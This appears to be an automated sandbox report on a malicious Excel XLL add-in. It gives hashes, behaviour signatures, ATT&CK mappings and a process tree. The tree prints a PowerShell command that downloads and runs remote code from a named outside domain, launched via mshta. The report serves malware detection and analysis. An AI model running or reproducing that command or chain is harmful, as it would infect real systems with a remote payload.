Analysis

  • max time kernel
    143s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-05-2024 18:08

General

  • Target

    af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc.xll

  • Size

    12KB

  • MD5

    ee5e9694a8a265985fe814a47b9246a0

  • SHA1

    ae2717c4016d750ad1c3c623467d8be176b40ecc

  • SHA256

    af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc

  • SHA512

    a261c07ad0f19af39871c3a5bffe46bf3e8604da7b9cb4d5a082825598c5247d9840aec0e3a5418fe489d008341eec31ad39b267b4da19bd22c66621b3b6d1a6

  • SSDEEP

    192:XL29RBzDzeobchBj8JONJONUruarEPEjr7AhG:729jnbcvYJOSuuavr7CG

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2092
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3568

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NCVVYLW7\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wzkxjcai.ocu.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc.xll
    Filesize

    12KB

    MD5

    ee5e9694a8a265985fe814a47b9246a0

    SHA1

    ae2717c4016d750ad1c3c623467d8be176b40ecc

    SHA256

    af1887e9da4c2003d139adc3954562ce1b56430ba36edeac5035a66fc8fcf2dc

    SHA512

    a261c07ad0f19af39871c3a5bffe46bf3e8604da7b9cb4d5a082825598c5247d9840aec0e3a5418fe489d008341eec31ad39b267b4da19bd22c66621b3b6d1a6

  • memory/3448-21-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-76-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-5-0x00007FFAC3A8D000-0x00007FFAC3A8E000-memory.dmp
    Filesize

    4KB

  • memory/3448-6-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-7-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-8-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-20-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-10-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-12-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-11-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-15-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-16-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-17-0x00007FFA81680000-0x00007FFA81690000-memory.dmp
    Filesize

    64KB

  • memory/3448-14-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-19-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-23-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-22-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-13-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-9-0x00007FFA81680000-0x00007FFA81690000-memory.dmp
    Filesize

    64KB

  • memory/3448-3-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp
    Filesize

    64KB

  • memory/3448-0-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp
    Filesize

    64KB

  • memory/3448-2-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp
    Filesize

    64KB

  • memory/3448-4-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp
    Filesize

    64KB

  • memory/3448-97-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3448-94-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp
    Filesize

    64KB

  • memory/3448-96-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp
    Filesize

    64KB

  • memory/3448-95-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp
    Filesize

    64KB

  • memory/3448-93-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp
    Filesize

    64KB

  • memory/3448-1-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp
    Filesize

    64KB

  • memory/3448-18-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp
    Filesize

    2.0MB

  • memory/3568-67-0x0000000005DD0000-0x0000000005DEE000-memory.dmp
    Filesize

    120KB

  • memory/3568-68-0x0000000005E10000-0x0000000005E5C000-memory.dmp
    Filesize

    304KB

  • memory/3568-69-0x0000000007420000-0x0000000007A9A000-memory.dmp
    Filesize

    6.5MB

  • memory/3568-70-0x00000000062F0000-0x000000000630A000-memory.dmp
    Filesize

    104KB

  • memory/3568-66-0x00000000057E0000-0x0000000005B34000-memory.dmp
    Filesize

    3.3MB

  • memory/3568-56-0x0000000005770000-0x00000000057D6000-memory.dmp
    Filesize

    408KB

  • memory/3568-55-0x0000000005650000-0x00000000056B6000-memory.dmp
    Filesize

    408KB

  • memory/3568-54-0x0000000005570000-0x0000000005592000-memory.dmp
    Filesize

    136KB

  • memory/3568-53-0x0000000004F40000-0x0000000005568000-memory.dmp
    Filesize

    6.2MB

  • memory/3568-52-0x0000000002810000-0x0000000002846000-memory.dmp
    Filesize

    216KB